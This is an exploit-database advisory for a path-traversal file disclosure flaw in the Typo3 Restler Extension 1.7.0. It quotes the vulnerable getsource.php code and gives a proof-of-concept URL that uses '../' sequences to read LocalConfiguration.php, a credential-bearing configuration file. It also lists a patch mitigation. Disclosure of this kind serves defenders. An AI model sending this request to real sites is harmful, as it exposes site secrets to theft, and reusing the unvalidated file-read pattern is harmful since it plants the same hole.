Typo3 Restler Extension - Local File Disclosure

vendor:

Typo3 Restler Extension

by:

CrashBandicot @dosperl

8,8

CVSS

HIGH

Local File Disclosure

CWE

Product Name: Typo3 Restler Extension

Affected Version From: 1.7.0

Affected Version To: 1.7.0

Patch Exists: YES

Related CWE: N/A

CPE: a:aoe:typo3_restler_extension

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: MsWin

2017

Typo3 Restler Extension – Local File Disclosure

The vulnerability exists due to insufficient validation of user-supplied input in the 'file' parameter of the 'getsource.php' script. A remote attacker can send a specially crafted request to the vulnerable script and read arbitrary files on the vulnerable system.

Mitigation:

Update to the latest version of the Typo3 Restler Extension

Source

Exploit-DB raw data:

# Exploit Title: Typo3 Restler Extension - Local File Disclosure
# Date: 2017-10-13
# Exploit Author: CrashBandicot @dosperl
# Vendor Homepage: https://www.aoe.com/
# Software Link: https://extensions.typo3.org/extension/restler/
# Tested on : MsWin
# Version: 1.7.0 (last)


# Vulnerability File : getsource.php

3.      $file = $_GET['file'];
13.        $text = file_get_contents($file);
16.      die($file . '<pre id="php">' . htmlspecialchars($text) . "</pre>");


# PoC : 
# http://vuln.site/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php

# https://i.imgur.com/zObmaDD.png


# Timeline :

# Vulnerability identified
# Vendor notified
# CVE number requested
# Exploit released